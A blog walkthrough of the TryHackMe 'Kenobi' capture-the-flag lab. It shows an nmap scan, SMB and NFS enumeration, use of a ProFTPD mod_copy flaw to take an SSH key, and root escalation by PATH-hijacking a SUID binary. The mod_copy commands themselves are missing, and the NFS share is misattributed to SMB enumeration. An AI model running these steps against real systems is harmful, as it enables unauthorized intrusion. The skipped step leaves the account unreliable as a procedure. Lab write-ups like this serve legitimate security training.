Help Me, Obi-Wan Kenobi. You're My Only Hope: Navigating the Kenobi CTF on TryHackMe

Help Me, Obi-Wan Kenobi. You're My Only Hope: Navigating the Kenobi CTF on TryHackMe

This walkthrough will cover the Kenobi CTF found on TryHackMe. It will include accessing a Samba share, exploiting a vulnerable version of ProFtpd to gain initial access, and escalating privileges to root using a SUID binary.

Step 1: Nmap

nmap -A -p- -T4 10.10.117.14 -vvv
PORT      STATE SERVICE     REASON         VERSION
21/tcp    open  ftp         syn-ack ttl 61 ProFTPD 1.3.5
22/tcp    open  ssh         syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8m00IxH/X5gfu6Cryqi5Ti2TKUSpqgmhreJsfLL8uBJrGAKQApxZ0lq2rKplqVMs+xwlGTuHNZBVeURqvOe9MmkMUOh4ZIXZJ9KNaBoJb27fXIvsS6sgPxSUuaeoWxutGwHHCDUbtqHuMAoSE2Nwl8G+VPc2DbbtSXcpu5c14HUzktDmsnfJo/5TFiRuYR0uqH8oDl6Zy3JSnbYe/QY+AfTpr1q7BDV85b6xP97/1WUTCw54CKUTV25Yc5h615EwQOMPwox94+48JVmgE00T4ARC3l6YWibqY6a5E8BU+fksse35fFCwJhJEk6xplDkeauKklmVqeMysMWdiAQtDj
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBpJvoJrIaQeGsbHE9vuz4iUyrUahyfHhN7wq9z3uce9F+Cdeme1O+vIfBkmjQJKWZ3vmezLSebtW3VRxKKH3n8=
|   256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGB22m99Wlybun7o/h9e6Ea/9kHMT0Dz2GqSodFqIWDi
80/tcp    open  http        syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/admin.html
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
111/tcp   open  rpcbind     syn-ack ttl 61 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100005  1,2,3      51719/udp6  mountd
|   100005  1,2,3      55558/udp   mountd
|   100005  1,2,3      59043/tcp   mountd
|   100005  1,2,3      60167/tcp6  mountd
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp   open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open              syn-ack ttl 61 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp  open  nfs_acl     syn-ack ttl 61 2-3 (RPC #100227)
34619/tcp open  nlockmgr    syn-ack ttl 61 1-4 (RPC #100021)
46053/tcp open  mountd      syn-ack ttl 61 1-3 (RPC #100005)
59043/tcp open  mountd      syn-ack ttl 61 1-3 (RPC #100005)
60883/tcp open  mountd      syn-ack ttl 61 1-3 (RPC #100005)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=7/7%OT=21%CT=1%CU=40628%PV=Y%DS=4%DC=T%G=Y%TM=64A89F2C
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10A%TI=Z%II=I%TS=8)SEQ(SP=10
OS:1%GCD=1%ISR=10A%TI=Z%II=I%TS=8)SEQ(SP=101%GCD=1%ISR=10A%TI=Z%CI=I%II=I%T
OS:S=8)SEQ(SP=101%GCD=2%ISR=109%TI=Z%II=I%TS=8)OPS(O1=M509ST11NW7%O2=M509ST
OS:11NW7%O3=M509NNT11NW7%O4=M509ST11NW7%O5=M509ST11NW7%O6=M509ST11)WIN(W1=6
OS:8DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M
OS:509NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T
OS:4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+
OS:%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y
OS:%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%
OS:RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.003 days (since Fri Jul  7 17:22:14 2023)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m03s, deviation: 2h53m12s, median: 2s
| nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KENOBI<00>           Flags: <unique><active>
|   KENOBI<03>           Flags: <unique><active>
|   KENOBI<20>           Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb2-time: 
|   date: 2023-07-07T23:26:33
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2023-07-07T18:26:33-05:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 18419/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 14290/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 27356/udp): CLEAN (Failed to receive data)
|   Check 4 (port 22821/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

This box contains multiple attack vectors to help enumerate and gather useful information to gain our initial foothold. To begin, we will focus on port 445, SMB.

Step 2: Enumerate SMB

Using nmap scripts we can further enumerate port 445 to find available shares.

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-user.nse 10.10.165.161

There are a total of 3 shares. Let's connect to one of them using smbclient.

smbclient //10.10.165.161/anonymous

Upon connecting, we discover a log.txt file. We can pull this down using the smbget command.

smbget -R smb://10.10.165.161/anonymous

Step 3: Enumerate NFS

Similar to SMB, we can use nmap scripts to further enumerate NFS.

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.165.161

We discover /var is a mountable network drive.

Step 4: ProFtpd

Using netcat we can determine what version of ProFtpd is running.

nc 10.10.165.161 21

Let's use searchsploit to see if this version has a vulnerability.

searchsploit ProFtpd 1.3.5

Looks like there is a Metasploit module called mod_copy. But let's do this the manual way using netcat.

What we did was move the private key over to /var since we discovered that was the mount point during our SMB enumeration. Let's mount to the /var/tmp directory now.

mkdir /mnt/kenobiNFS
mount 10.10.165.161:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS

We now have the network mounted on our attack box. Let's pull down the id_rsa SSH key and use it to connect to the box using Kenobi's account.

We're in! You'll find your first flag at /home/kenobi/user.txt.

Step 5: Privesc and Root

Let's search the system for a binary running elevated permissions.

find / -perm -u=s -type f 2>/dev/null

The binary /usr/bin/menu is not ordinary and can be used for elevating privileges. Let's move it over to the /tmp directory since we know it's writable. From there we can change the name of /bin/sh to curl and give it the appropriate permissions to run. From there we will put it on the same path as /tmp.

echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
/usr/bin/menu

And we have root! Type cat /root/root.txt and you'll find your last flag.

I hope you enjoyed this walkthrough of the Kenobi CTF found on TryHackMe. Happy Hacking.

Did you find this article valuable?

Support Jake Garrison by becoming a sponsor. Any amount is appreciated!